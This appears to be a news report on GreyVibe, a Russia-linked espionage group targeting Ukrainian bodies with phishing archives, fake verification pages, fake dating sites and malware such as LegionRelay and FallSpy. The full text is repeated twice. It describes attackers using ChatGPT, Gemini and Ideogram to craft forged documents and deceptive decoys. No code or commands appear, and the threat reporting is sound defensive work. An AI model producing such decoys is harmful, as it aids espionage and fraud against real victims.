The GreyVibe group, linked to Russia, leverages ChatGPT and Gemini AI to design cyberattacks against strategic targets. Researchers detected the activity at the beginning of 2026, although analyses suggest that the operation had been active since at least August 2025.
Their main targets have been Ukrainian organizations or entities related to Ukraine, including government bodies, military structures, private companies, and civil organizations.
A multi-front espionage campaign
Everything indicates that GreyVibe maintains activity compatible with intelligence operations aligned with Russia's strategic interests. However, there is still insufficient evidence to attribute the campaign directly to the Russian state, according to Bleeping Computer.
The evidence pointing to a Russian origin includes the language used in various malicious tools, comments found in the code of the programs used, and the time zone configuration of their command and control infrastructures, adjusted to Moscow's time zone.
What sets GreyVibe apart from other groups is the breadth of techniques employed. Researchers have identified several simultaneous operations aimed at deceiving victims through emails, fake websites, fraudulent applications, and espionage tools specifically designed for each scenario.
The role of ChatGPT and Gemini in the attacks
One of the most striking aspects of the report is the intensive use of generative artificial intelligence. Analysts detected indications that GreyVibe used tools like ChatGPT, Google Gemini, and Ideogram AI to develop highly realistic content for their deception campaigns.
Thanks to these platforms, the attackers were able to generate forged documents, convincing images, and social engineering materials with a level of detail superior to that usually observed in traditional campaigns.
AI allowed for the construction of more credible decoys, tailored to different victim profiles and with a visual appearance capable of significantly increasing the success rate of the attacks.
This phenomenon reflects a growing trend within the cybercrime ecosystem: the use of language models to automate tasks that previously required more time, specialized knowledge, and human resources.
Malicious emails and fraudulent downloads
Among the detected campaigns was an operation based on emails specifically directed at certain victims.
The messages distributed compressed files hosted on legitimate cloud storage services. The documents appeared to originate from government bodies, energy companies, telecommunications entities, or emergency services linked to Ukraine.
Once downloaded, the files activated different malicious payloads capable of compromising the affected systems.
The use of legitimate platforms to distribute malware makes it difficult to detect these threats and increases users' trust in the received files.
Fake portals and digital traps
Another technique employed involved creating websites that mimicked widely known services.
Some simulated security verification processes similar to those used by popular video conferencing platforms or web protection systems. Victims were induced to execute commands on their own systems under the false belief of completing a security check.
Researchers also located fake dating portals and adult sites aimed at the Ukrainian public. These sites distributed spyware for Android and malicious tools for Windows systems capable of collecting sensitive information.
Even fictional characters were detected being used in messaging applications to maintain conversations with the victims to build trust before initiating information theft.
Malware designed for espionage
GreyVibe employed several families of malware specifically developed for their operations.
Among them, LegionRelay stands out, a remote access trojan based on PowerShell that allows for extracting files, capturing screens, obtaining credentials stored in browsers, and collecting data from messaging applications like Telegram or WhatsApp.
Researchers believe that part of its development may have also relied on artificial intelligence tools.
Another identified threat is PhantomRelay, capable of collecting information from the compromised system, executing remote commands, and dynamically loading scripts.
On Android devices, GreyVibe used FallSpy, a spyware designed to collect contacts, call logs, locations, media files, network information, and SIM card data.
A group halfway between espionage and cybercrime
Although the observed activity resembles state-sponsored intelligence campaigns, researchers found behaviors uncommon in highly sophisticated governmental actors.
For example, some test versions of the malware were uploaded to public analysis platforms, a practice usually avoided in professional espionage operations. Occasional deployment of cryptocurrency mining programs on compromised systems was also detected.
These indications suggest that GreyVibe could be composed of former cybercriminals, current members of criminal organizations, or even hybrid teams combining economic interests with geopolitical objectives.
The GreyVibe group, linked to Russia, leverages ChatGPT and Gemini AI to design cyberattacks against strategic targets. Researchers detected the activity at the beginning of 2026, although analyses suggest that the operation had been active since at least August 2025.
Their main targets have been Ukrainian organizations or entities related to Ukraine, including government bodies, military structures, private companies, and civil organizations.
A multi-front espionage campaign
Everything indicates that GreyVibe maintains activity compatible with intelligence operations aligned with Russia's strategic interests. However, there is still insufficient evidence to attribute the campaign directly to the Russian state, according to Bleeping Computer.
The evidence pointing to a Russian origin includes the language used in various malicious tools, comments found in the code of the programs used, and the time zone configuration of their command and control infrastructures, adjusted to Moscow's time zone.
What sets GreyVibe apart from other groups is the breadth of techniques employed. Researchers have identified several simultaneous operations aimed at deceiving victims through emails, fake websites, fraudulent applications, and espionage tools specifically designed for each scenario.
The role of ChatGPT and Gemini in the attacks
One of the most striking aspects of the report is the intensive use of generative artificial intelligence. Analysts detected indications that GreyVibe used tools like ChatGPT, Google Gemini, and Ideogram AI to develop highly realistic content for their deception campaigns.
Thanks to these platforms, the attackers were able to generate forged documents, convincing images, and social engineering materials with a level of detail superior to that usually observed in traditional campaigns.
AI allowed for the construction of more credible decoys, tailored to different victim profiles and with a visual appearance capable of significantly increasing the success rate of the attacks.
This phenomenon reflects a growing trend within the cybercrime ecosystem: the use of language models to automate tasks that previously required more time, specialized knowledge, and human resources.
Malicious emails and fraudulent downloads
Among the detected campaigns was an operation based on emails specifically directed at certain victims.
The messages distributed compressed files hosted on legitimate cloud storage services. The documents appeared to originate from government bodies, energy companies, telecommunications entities, or emergency services linked to Ukraine.
Once downloaded, the files activated different malicious payloads capable of compromising the affected systems.
The use of legitimate platforms to distribute malware makes it difficult to detect these threats and increases users' trust in the received files.
Fake portals and digital traps
Another technique employed involved creating websites that mimicked widely known services.
Some simulated security verification processes similar to those used by popular video conferencing platforms or web protection systems. Victims were induced to execute commands on their own systems under the false belief of completing a security check.
Researchers also located fake dating portals and adult sites aimed at the Ukrainian public. These sites distributed spyware for Android and malicious tools for Windows systems capable of collecting sensitive information.
Even fictional characters were detected being used in messaging applications to maintain conversations with the victims to build trust before initiating information theft.
Malware designed for espionage
GreyVibe employed several families of malware specifically developed for their operations.
Among them, LegionRelay stands out, a remote access trojan based on PowerShell that allows for extracting files, capturing screens, obtaining credentials stored in browsers, and collecting data from messaging applications like Telegram or WhatsApp.
Researchers believe that part of its development may have also relied on artificial intelligence tools.
Another identified threat is PhantomRelay, capable of collecting information from the compromised system, executing remote commands, and dynamically loading scripts.
On Android devices, GreyVibe used FallSpy, a spyware designed to collect contacts, call logs, locations, media files, network information, and SIM card data.
A group halfway between espionage and cybercrime
Although the observed activity resembles state-sponsored intelligence campaigns, researchers found behaviors uncommon in highly sophisticated governmental actors.
For example, some test versions of the malware were uploaded to public analysis platforms, a practice usually avoided in professional espionage operations. Occasional deployment of cryptocurrency mining programs on compromised systems was also detected.
These indications suggest that GreyVibe could be composed of former cybercriminals, current members of criminal organizations, or even hybrid teams combining economic interests with geopolitical objectives.